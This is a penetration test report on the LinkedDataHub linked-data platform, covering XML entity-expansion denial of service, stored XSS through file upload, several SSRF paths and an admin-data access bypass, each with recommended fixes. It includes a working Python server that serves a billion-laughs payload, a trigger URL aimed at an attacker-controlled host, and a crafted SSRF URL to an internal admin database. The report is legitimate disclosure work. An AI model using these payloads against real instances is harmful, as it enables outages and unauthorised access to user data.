Penetration test report

Martynas Jusevičius edited this page Nov 24, 2025 · 1 revision

Penetration Test Report - LinkedDataHub

Version: 1.0
Date: Amsterdam, October 1st, 2025
Classification: Confidential

Document Properties

Property Value
Client LinkedDataHub
Title Penetration Test Report
Target LinkedDataHub v5.0.23
Version 1.0
Pentester Thomas Rinsma
Authors Thomas Rinsma, Marcus Bointon
Reviewed by Marcus Bointon
Approved by Melanie Rieback

Version Control

Version | Date | Author | Description
0.1 | September 23rd, 2025 | Thomas Rinsma | Initial draft
0.2 | September 29th, 2025 | Marcus Bointon | Review
1.0 | October 1st, 2025 | Marcus Bointon | 1.0

Contact

For more information about this document and its contents please contact Radically Open Security B.V.

Name Melanie Rieback
Address Science Park 608, 1098 XH Amsterdam, The Netherlands
Phone +31 (0)20 2621 255
Email info@radicallyopensecurity.com

1. Executive Summary

1.1 Introduction

Between September 16, 2025 and September 24, 2025, Radically Open Security B.V. carried out a penetration test of LinkedDataHub.

This report contains our findings as well as detailed explanations of exactly how ROS performed the penetration test.

1.2 Scope of Work

The scope of the penetration test was limited to the following target:

  • LinkedDataHub v5.0.23

The scoped services are broken down as follows:

  • Audit and pentest of LinkedDataHub: 5 days
  • Total effort: 5 days

1.3 Project Objectives

ROS will perform a code audit and penetration test of LinkedDataHub in order to assess its security. To do so, ROS will audit LinkedDataHub and guide its developers in attempting to find vulnerabilities, exploiting any such found to try and gain further access and elevated privileges.

1.4 Timeline

The security audit took place between September 16, 2025 and September 24, 2025.

1.5 Results In A Nutshell

During this crystal-box penetration test we found 2 High, 2 Elevated and 2 Low-severity issues.

LinkedDataHub is an open and flexible platform allowing users to upload, query, and retrieve data both internal and external to the system. This openness makes it inherently vulnerable to attacks that exploit these functionalities, such as Server-Side Request Forgery (SSRF) and Cross-Site Scripting (XSS).

A stored XSS vulnerability in LNK-011 allows both HTML and JavaScript injection by authenticated users that could result in account takeover.

While LinkedDataHub provides the ability to configure granular access control rules, we find that few permissions are required to exploit some of the more severe issues found during this pentest. Most critically, LNK-005 allows a regular end-user to crash the LinkedDataHub instance, resulting in complete denial of service.

The SSRF primitives found in LNK-003 and LNK-004 can be exploited by any authenticated user, and the one in LNK-002 by admins. All of them allow some degree of read access to internal resources, including the Fuseki admin interface as shown in LNK-009.

1.6 Summary of Findings

Info | Description
LNK-005 (High) - Denial-of-Service | XML entities are recursively expanded when parsing RDF content, leading to a so-called billion laughs attack, filling the server's memory and causing Docker to kill LinkedDataHub containers.
LNK-011 (High) - Cross-Site Scripting | By simply uploading an HTML file through the LinkedDataHub user interface, a stored XSS attack can be performed.
LNK-003 (Elevated) - Server-Side Request Forgery | The uri functionality to load external RDF datasets allows attackers to query internal network and system resources.
LNK-009 (Elevated) - Access control bypass | By using the uri proxy functionality, a non-admin user is able to access resources stored in fuseki-admin.
LNK-002 (Low) - Server-Side Request Forgery | The endpoint /admin/transform allows attackers to query network- and system-internal resources via the dct:source and spin:query parameters.
LNK-004 (Low) - Server-Side Request Forgery | The On-Behalf-Of header used for delegated authentication allows attackers to query network- and system-internal resources.

1.7 Summary of Recommendations

Info | Recommendation
LNK-005 (High) | Configure the XML parser so that XML entities are not expanded, or that there is at least a recursion limit.
LNK-011 (High) | For file uploads, don't allow MIME-types that are actively interpreted by browsers, such as those belonging to HTML and CSS. Use the Content-Disposition header to serve the files as attachments instead.
LNK-003 (Elevated) | Limit server-side HTTP fetch mechanisms as much as possible, ideally with allow lists. If this is not possible, it may be beneficial to implement domain filtering to restrict such internal access, but be aware of DNS (rebinding) attacks, which could bypass such filters.
LNK-009 (Elevated) | Limit server-side HTTP fetch mechanisms as much as possible, ideally with allow lists. If this is not possible, it may be beneficial to implement domain filtering to restrict such internal access, but be aware of DNS (rebinding) attacks, which could bypass such filters.
LNK-002 (Low) | Limit server-side HTTP fetch mechanisms as much as possible, ideally with allow lists. If this is not possible, it may be beneficial to implement domain filtering to restrict such internal access, but be aware of DNS (rebinding) attacks, which could bypass such filters.
LNK-004 (Low) | Limit server-side HTTP fetch mechanisms as much as possible, ideally with allow lists. If this is not possible, it may be beneficial to implement domain filtering to restrict such internal access, but be aware of DNS (rebinding) attacks, which could bypass such filters.

2. Methodology

2.1 Planning

Our general approach during penetration tests is as follows:

  1. Reconnaissance: We attempt to gather as much information as possible about the target. Reconnaissance can take two forms: active and passive. A passive attack is always the best starting point as this would normally defeat intrusion detection systems and other forms of protection afforded to the app or network. This usually involves trying to discover publicly available information by visiting websites, newsgroups, etc. An active form would be more intrusive, could possibly show up in audit logs and might take the form of a social engineering type of attack.

  2. Enumeration: We use various fingerprinting tools to determine what hosts are visible on the target network and, more importantly, try to ascertain what services and operating systems they are running. Visible services are researched further to tailor subsequent tests to match.

  3. Scanning: Vulnerability scanners are used to scan all discovered hosts for known vulnerabilities or weaknesses. The results are analyzed to determine if there are any vulnerabilities that could be exploited to gain access or enhance privileges to target hosts.

  4. Obtaining Access: We use the results of the scans to assist in attempting to obtain access to target systems and services, or to escalate privileges where access has been obtained (either legitimately through provided credentials, or via vulnerabilities). This may be done surreptitiously (for example to try to evade intrusion detection systems or rate limits) or by more aggressive brute-force methods. This step also consists of manually testing the application against the latest (2021) list of OWASP Top 10 risks. The vulnerabilities discovered through scanning and manual testing are then used to further elevate access on the application.

2.2 Risk Classification

Throughout the report, vulnerabilities or risks are labeled and categorized according to the Penetration Testing Execution Standard (PTES). For more information, see: http://www.pentest-standard.org/index.php/Reporting

These categories are:

  • Extreme - Extreme risk of security controls being compromised with the possibility of catastrophic financial/reputational losses occurring as a result.
  • High - High risk of security controls being compromised with the potential for significant financial/reputational losses occurring as a result.
  • Elevated - Elevated risk of security controls being compromised with the potential for material financial/reputational losses occurring as a result.
  • Moderate - Moderate risk of security controls being compromised with the potential for limited financial/reputational losses occurring as a result.
  • Low - Low risk of security controls being compromised with measurable negative impacts as a result.

3. Findings

3.1 LNK-005 — Denial of service through entity expansion in RDF processing

Vulnerability ID LNK-005
Vulnerability type Denial-of-Service
Threat level High

Description

XML entities are recursively expanded when parsing RDF content, leading to a so-called billion laughs attack, filling the server's memory and causing Docker to kill LinkedDataHub containers.

Technical description

Through the uri dataset retrieval feature detailed in LNK-003, it is possible to pass arbitrary RDF data to a LinkedDataHub instance for it to process. When processing XML-formatted RDF data, LinkedDataHub attempts to expand XML entities recursively, without any constraints. This enables a so-called billion laughs attack, in which a small crafted payload expands to a multi-gigabyte buffer in memory.

Because LinkedDataHub is configured with memory limits through docker-compose, processing such a payload will cause Docker to kill LinkedDataHub, or one of the other containers in the docker-compose file.
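To give a feel for the amplification, the following back-of-the-envelope Python sketch computes how many characters a nested entity expands to, assuming ten references per level and the base string "lol" as in the payload of this finding. The function name is ours and purely illustrative; actual memory use in the JVM depends on string encoding and intermediate buffers, which this estimate ignores.

```python
def expanded_chars(level: int, fanout: int = 10, base: str = "lol") -> int:
    """Characters produced by fully expanding entity number `level`.

    Level 1 is the base entity; every later level references the
    previous one `fanout` times.
    """
    return len(base) * fanout ** (level - 1)


for level in (1, 5, 9, 10):
    name = "lol" if level == 1 else f"lol{level}"
    print(f"&{name}; expands to {expanded_chars(level):,} characters")
```

Under these assumptions, a reference to the ninth entity already yields 300 million characters from roughly one kilobyte of XML, and each additional level multiplies that by ten.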

To demonstrate, the following Python script serves the billion laughs payload with an application/rdf+xml MIME-type:

from http.server import BaseHTTPRequestHandler, HTTPServer

HOST = '0.0.0.0'
PORT = 1337
RESPONSE = """<?xml version="1.0" encoding="UTF-8"?>
  <!DOCTYPE rdf:RDF [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
  <!ENTITY lol10 "&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;">
  ]>
  <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
           xmlns:foaf="http://xmlns.com/foaf/0.1/">
    <foaf:Person>
        <foaf:name>&lol9;</foaf:name>
    </foaf:Person>
  </rdf:RDF>
"""

class SimpleXMLHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header('Content-type', 'application/rdf+xml')
        self.end_headers()
        self.wfile.write(RESPONSE.encode('utf-8'))

if __name__ == "__main__":
    server = HTTPServer((HOST, PORT), SimpleXMLHandler)
    print(f"Serving on http://{HOST}:{PORT}")
    server.serve_forever()

The denial-of-service can be triggered by accessing the following URL:

https://localhost:4443/?uri=<ATTACKER_IP>:1337

Impact

Any (non-admin) user with privileges to use the uri proxy functionality can easily abuse this vulnerability to take down a LinkedDataHub instance with a couple of HTTP requests. As this has a high impact on availability, the threat level is high.

Recommendation

  • Configure the XML parser so that XML entities are not expanded, or that there is at least a recursion limit.
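As an illustration of the first option, the sketch below uses Python's standard expat bindings to abort parsing as soon as a DOCTYPE declaration is seen, so that no entity can be declared or expanded. It is not LinkedDataHub code: LinkedDataHub is a Java application, and the equivalent setting for its XML parser would have to be identified separately. The function and exception names are hypothetical.

```python
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when a document contains a DOCTYPE declaration."""


def parse_rejecting_doctype(data: bytes) -> None:
    """Parse `data`, aborting as soon as a DOCTYPE declaration appears.

    Internal entities can only be declared inside a DOCTYPE, so refusing
    the DOCTYPE also rules out entity expansion.
    """
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise DoctypeForbidden(f"DOCTYPE declaration not allowed: {name}")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(data, True)  # True marks this as the final chunk
```

Rejecting every DOCTYPE is stricter than the recommendation requires. RDF/XML documents sometimes declare entities as namespace shorthands, so a limit on expansion depth or expanded size may be the more compatible choice.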

3.2 LNK-011 — JavaScript execution (XSS) through HTML file upload

Vulnerability ID LNK-011
Vulnerability type Cross-Site Scripting
Threat level High

Description

By simply uploading an HTML file through the LinkedDataHub user interface, a stored XSS attack can be performed.

Technical description

Through the LinkedDataHub user interface, it is possible for a user with the right permissions to upload files and configure them to be served with an arbitrary MIME-type. Hence, by configuring the right MIME-type, an uploaded HTML file will be interpreted by the browser as HTML.

This uploaded file is served from the uploads/ folder on the same domain as other LinkedDataHub functionality, e.g.:

https://localhost:4443/uploads/71962b2ede736f98707833750c0f5ea4e3e83185

Because the attacker has full control over the HTML and JavaScript in this file, this enables attacks such as:

  • Phishing: presenting a fake LinkedDataHub login form, sending entered credentials to the attacker's server.
  • Cookie theft: using JavaScript to obtain the user's cookies and stealing OAuth-related authentication data.
  • Impersonation: using JavaScript, the page could perform any action in the name of the victim user (e.g., an admin) by sending background requests, all without the victim's knowledge.

Impact

By crafting a malicious HTML file and sending this to a victim user (e.g., an admin), an attacker can control or even fully take over the victim's LinkedDataHub account. Hence, the impact is high.

Recommendation

  • For file uploads, don't allow MIME-types that are actively interpreted by browsers, such as those belonging to HTML and CSS.
  • Use the Content-Disposition header to serve the files as attachments instead.
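The two recommendations can be combined when building the response for an uploaded file. The Python sketch below is a minimal illustration under stated assumptions: the allow list, the function name and the fallback type are ours, and the X-Content-Type-Options header is an addition that goes beyond the recommendation above. It does not reflect how LinkedDataHub serves uploads.

```python
import re

# Assumption: an illustrative allow list; a real deployment would choose its own.
INERT_TYPES = {"image/png", "image/jpeg", "text/plain", "text/csv"}


def upload_response_headers(declared_type: str, filename: str) -> dict[str, str]:
    """Headers for serving an uploaded file without letting the browser render it."""
    # Drop parameters such as charset and normalise case before comparing.
    media_type = declared_type.split(";", 1)[0].strip().lower()
    if media_type not in INERT_TYPES:
        media_type = "application/octet-stream"
    # Keep only conservative characters so the name cannot break out of the header value.
    safe_name = re.sub(r"[^A-Za-z0-9._-]", "_", filename) or "download"
    return {
        "Content-Type": media_type,
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "X-Content-Type-Options": "nosniff",
    }
```

With these headers, a file uploaded as text/html is delivered as a generic binary download instead of being rendered on the LinkedDataHub origin.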

3.3 LNK-003 — SSRF primitive via uri query parameter

Vulnerability ID LNK-003
Vulnerability type Server-Side Request Forgery
Threat level Elevated

Description

The uri functionality to load external RDF datasets allows attackers to query internal network and system resources.

Technical description

If the user has the right permissions and makes a request to /?uri=http://example.org, LinkedDataHub will attempt to fetch http://example.org with a GET request, looking for an RDF-formatted response type or HTML containing JSON-formatted RDF in a script tag. The resulting data is interpreted and shown to the user in a formatted manner.

A vulnerability arises when there are services internal to the server or network on which LinkedDataHub is running, which return RDF(-like) data. An attacker could abuse this proxy functionality to gain read access to that data. For example, LNK-009 shows how this causes an access control bypass vulnerability within LinkedDataHub itself.

Impact

While LNK-009 shows a direct impact on LinkedDataHub itself, the overall impact of this issue depends on the system and surrounding network in which LinkedDataHub is deployed.

Importantly, no admin privileges are required to execute these requests. However, the HTTP response is not returned to the attacker directly; it is instead processed for RDF data. This makes the attack partially blind.

Recommendation

  • Limit server-side HTTP fetch mechanisms as much as possible, ideally with allow lists.
  • If this is not possible, it may be beneficial to implement domain filtering to restrict such internal access, but be aware of DNS (rebinding) attacks, which could bypass such filters.
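The following Python sketch shows one way such a check could look: an optional host allow list, followed by a filter that rejects any host resolving to a loopback, private or otherwise non-public address. All names are hypothetical and the sketch is not taken from LinkedDataHub; it only illustrates the order of the checks.

```python
import ipaddress
import socket
from urllib.parse import urlsplit


def resolve_host(host: str) -> list[str]:
    """Resolve `host` to its IP addresses using the system resolver."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_internal(address: str) -> bool:
    """True for addresses that should not be reachable through a fetch proxy."""
    ip = ipaddress.ip_address(address)
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def check_fetch_target(url: str, allowed_hosts: set[str], resolve=resolve_host) -> list[str]:
    """Return the vetted IP addresses for `url`, or raise ValueError.

    An empty `allowed_hosts` disables the allow list and leaves only
    the address filter in place.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise ValueError(f"unsupported URL: {url!r}")
    host = parts.hostname.lower()
    if allowed_hosts and host not in allowed_hosts:
        raise ValueError(f"host not on allow list: {host}")
    addresses = resolve(host)
    if not addresses or any(is_internal(a) for a in addresses):
        raise ValueError(f"host resolves to an internal address: {host}")
    return addresses
```

To blunt DNS rebinding, the subsequent HTTP connection should be made to one of the returned addresses rather than resolving the host name a second time, since a second lookup may return a different answer.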

3.4 LNK-009 — Indirect access to fuseki-admin via uri feature

Vulnerability ID LNK-009
Vulnerability type Access control bypass
Threat level Elevated

Description

By using the uri proxy functionality, a non-admin user is able to access resources stored in fuseki-admin.

Technical description

LinkedDataHub splits data between the end-user and admin Fuseki instances. Regular users normally only have limited access to data stored in admin, as enforced by LinkedDataHub itself, which normally proxies all data access.

However, the uri query parameter effectively exposes a Server-Side Request Forgery (SSRF) primitive (as detailed in LNK-003), where the LinkedDataHub backend will make a GET request to an HTTP endpoint, interpreting and serving the result if it is in a known RDF format. We can abuse this by constructing a URL pointing to the admin Fuseki server at http://fuseki-admin:3030 in the Docker network, passing an arbitrary SPARQL query using the /ds/?query= endpoint. The resulting RDF data is then neatly served by LinkedDataHub, bypassing any access control.

As an example, to run the following query on the admin instance:

SELECT ?msg
WHERE {
  BIND("hello world" AS ?msg)
}

we'd URL-encode it, and construct the following URL:

http://fuseki-admin:3030/ds/?query=SELECT%20%3Fmsg%0AWHERE%20%7B%0A%20%20BIND%28%22hello%20world%22%20AS%20%3Fmsg%29%0A%7D

which we then URL-encode again, and pass to the LinkedDataHub front-end, as the uri parameter.
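The two encoding steps can be reproduced with Python's standard library. This is a minimal sketch using the harmless example query above; the host names and ports are the ones from our test setup and will differ in other deployments.

```python
from urllib.parse import quote

QUERY = 'SELECT ?msg\nWHERE {\n  BIND("hello world" AS ?msg)\n}'

# Assumptions: host names and ports as they appear in this report's test setup.
FUSEKI_ADMIN = "http://fuseki-admin:3030/ds/"
LDH_BASE = "https://localhost:4443/"

# First encoding: the SPARQL query becomes a query-string value for Fuseki.
inner_url = FUSEKI_ADMIN + "?query=" + quote(QUERY, safe="")

# Second encoding: the whole Fuseki URL becomes the value of the uri parameter.
outer_url = LDH_BASE + "?uri=" + quote(inner_url, safe="")

print(inner_url)
print(outer_url)
```

The first printed line matches the Fuseki URL shown above. In the second, every percent sign of the inner URL is itself encoded as %25, which is why LinkedDataHub recovers the inner URL intact before fetching it.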

Similarly, this technique can be used to show the full list of users and their properties (e.g., email address) to a non-admin user.

Impact

This vulnerability effectively bypasses any access control for read-access to any data in either of the Fuseki instances. Depending on what data is stored, the impact varies. In a default installation, this allows a user with access to the uri feature to enumerate all users and related admin data (e.g., ACLs), leading to a potential privacy issue.

Recommendation

  • Limit server-side HTTP fetch mechanisms as much as possible, ideally with allow lists.
  • If this is not possible, it may be beneficial to implement domain filtering to restrict such internal access, but be aware of DNS (rebinding) attacks, which could bypass such filters.

3.5 LNK-002 — SSRF primitives in admin endpoint

Vulnerability ID LNK-002
Vulnerability type Server-Side Request Forgery
Threat level Low

Description

The endpoint /admin/transform allows attackers to query network- and system-internal resources via the dct:source and spin:query parameters.

Technical description

When processing a POST request, the Transform class extracts the spin:query and dct:source properties from the RDF payload and makes unvalidated HTTP GET requests to these URLs.

Specifically, QueryLoader fetches a SPIN query resource from the URL provided in spin:query via LinkedDataClient.get(), and LinkedDataClient is used to fetch RDF data from the dct:source URL for transformation processing:

LinkedDataClient ldc = LinkedDataClient.create(getSystem().getClient(),
  getSystem().getMediaTypes()).delegation(getUriInfo().getBaseUri(), getAgentContext().orElse(null));
QueryLoader queryLoader = new QueryLoader(URI.create(queryRes.getURI()),
  getApplication().getBase().getURI(), Syntax.syntaxARQ, ldc);
Query query = queryLoader.get();

if (!query.isConstructType()) throw new BadRequestException("Transformation query is not of CONSTRUCT type");

Model importModel = ldc.getModel(source.getURI());
try (QueryExecution qex = QueryExecution.create(query, importModel))
{
    Model transformModel = qex.execConstruct();
    importModel.add(transformModel); // append transform results
    // forward the stream to the named graph document -- do not directly append triples to graph
    // because the agent might not have access to it
    return forwardPost(Entity.entity(importModel,
      com.atomgraph.core.MediaType.APPLICATION_NTRIPLES_TYPE), graph.getURI());
}

Impact

As partial content of the HTTP response is returned, this may allow an attacker to obtain information about systems internal to the server or network on which LinkedDataHub is running. However, as only partial content is returned and admin privileges are required to exploit this vulnerability, the impact is low.

Recommendation

  • Limit server-side HTTP fetch mechanisms as much as possible, ideally with allow lists.
  • If this is not possible, it may be beneficial to implement domain filtering to restrict such internal access, but be aware of DNS (rebinding) attacks, which could bypass such filters.

3.6 LNK-004 — SSRF primitive via On-Behalf-Of header

Vulnerability ID LNK-004
Vulnerability type Server-Side Request Forgery
Threat level Low

Description

The On-Behalf-Of header used for delegated authentication allows attackers to query network- and system-internal resources.

Technical description

As part of its WebID support, LinkedDataHub supports delegated authentication via the On-Behalf-Of header, shown in the snippet below.

The value in this header normally points to an external resource (an HTTP URL), but this is not verified by LinkedDataHub. Hence, an attacker could specify a URL pointing to a resource internal to the server or network containing the LinkedDataHub instance, and this will be fetched by the LinkedDataHub backend.

String onBehalfOf = request.getHeaderString(ON_BEHALF_OF);
if (onBehalfOf != null)
{
    URI principalWebID = new URI(onBehalfOf);
    Model principalWebIDModel = loadWebID(principalWebID);
    Resource principal = principalWebIDModel.createResource(onBehalfOf);
    // if we verify that the current agent is a secretary of the principal, that principal becomes
    // current agent. Else throw error
    if (agent.equals(principal) || principal.getModel().contains(agent, ACL.delegates, principal))
    {
        agent = principal;
        getSystem().getWebIDModelCache().put(principalWebID, principal.getModel()); // now it's safe
        // to cache the principal's Model
    }
    else throw new WebIDDelegationException(agent, principal);
}

Impact

No admin privileges are required to execute these requests. However, the internal request uses the GET method (limiting it to read-only actions) and only a small part of the HTTP response is returned to the attacker. This makes the attack partially blind and unlikely to affect most services, resulting in a low overall impact.

Recommendation

  • Limit server-side HTTP fetch mechanisms as much as possible, ideally with allow lists.
  • If this is not possible, it may be beneficial to implement domain filtering to restrict such internal access, but be aware of DNS (rebinding) attacks, which could bypass such filters.

4. Non-Findings

In this section we list some of the things that were tried but turned out to be dead ends.

4.1 NF-001 — Older Fuseki version containing known vulnerabilities

LinkedDataHub uses Fuseki 4.7.0. This version has known flaws in which the scripting engine is enabled by default (CVE-2023-32200 and CVE-2023-22665). Luckily, this does not seem to impact LinkedDataHub as the minimal Java 21 installation used in the AtomGraph/fuseki-docker container does not include Graal.js or any other scripting engine. Nevertheless, we recommend keeping Fuseki up to date.

4.2 NF-006 — Potential cache poisoning

We tried to perform cache poisoning attacks against the Varnish configuration but were unsuccessful.

Specifically, we tested Host header-based cache poisoning by manipulating the Host header to poison cached responses for other users. If successful, this might allow an attacker to cause victims to load the attacker's JavaScript resources as opposed to the intended ones. However, we found that:

  • the Varnish configuration in docker-compose.yml:316 uses req.url == bereq.url && req.http.host == bereq.http.host for cache invalidation, hence a different Host header should invalidate the cache entry;
  • LinkedDataHub does not appear to use the Host header in constructing resource links.

Hence, no such issue is present in LinkedDataHub.

4.3 NF-008 — Potential argument injection in WebIDCertGen

The generate method in com.atomgraph.linkeddatahub.server.util.WebIDCertGen appears to be vulnerable to argument injection:

String[] args =
{
    "-genkeypair",
    "-keyalg", getKeyAlg(),
    "-storetype", getStoreType(),
    "-keystore", keyStorePath.toString(),
    "-storepass", storePass,
    "-keypass", keyPass,
    "-alias", alias,
    "-dname", dName,
    "-ext", "SAN=uri:" + webIDURI,
    "-validity", String.valueOf(validity)
};

sun.security.tools.keytool.Main.main(args);

However, this is not exploitable because the keytool library properly sanitizes and validates all input parameters before execution. The keytool implementation uses safe parameter binding that prevents command injection attacks, and all user-supplied values are treated as data rather than parameter names or commands, making argument injection impossible.


5. Future Work

  • Keep dependencies up-to-date and follow security best practices: Ensure that critical dependencies such as Fuseki and other Jena libraries are kept up to date and follow best practices regarding configuration to minimize the overall attack surface.

  • Retest of findings: When mitigations for the vulnerabilities described in this report have been deployed, perform a repeat test to ensure that they are effective and have not introduced other security problems.

  • Regular security assessments: Security is a process that must be continuously evaluated and improved; this penetration test is just a single snapshot. Regular audits and ongoing improvements are essential in order to maintain control of your corporate information security.


6. Conclusion

We discovered 2 High, 2 Elevated and 2 Low-severity issues during this penetration test.

Overall, we find that LinkedDataHub is a very flexible platform which places a relatively high amount of trust in its users. Once a user is registered and obtains basic access permissions, they can abuse core functionality (e.g. external RDF dataset lookup and file uploads) to perform unintended actions and eventually even escalate their privileges. These problems show that more focus could be placed on security, specifically with threat models associated with registered, non-admin users.

We recommend fixing all of the issues found and then performing a retest in order to ensure that mitigations are effective and that no new vulnerabilities have been introduced.

Finally, we want to emphasize that security is a process that must be continuously evaluated and improved; this penetration test is just a one-time snapshot. Regular audits and ongoing improvements are essential in order to maintain control of your corporate information security. We hope that this pentest report (and the detailed explanations of our findings) will contribute meaningfully towards that end.

Please don't hesitate to let us know if you have any further questions, or need further clarification on anything in this report.


Appendix 1: Testing Team

Name | Description
Thomas Rinsma | Thomas Rinsma is a security analyst and hobby hacker. His specialty is in application-level software security, with a tendency for finding bugs in open-source dependencies resulting in various CVEs. Professionally, he has experience testing everything from hypervisors to smart meters, but anything with a security boundary to bypass interests him.
Melanie Rieback | Melanie Rieback is a former Asst. Prof. of Computer Science from the VU, who is also the co-founder/CEO of Radically Open Security.
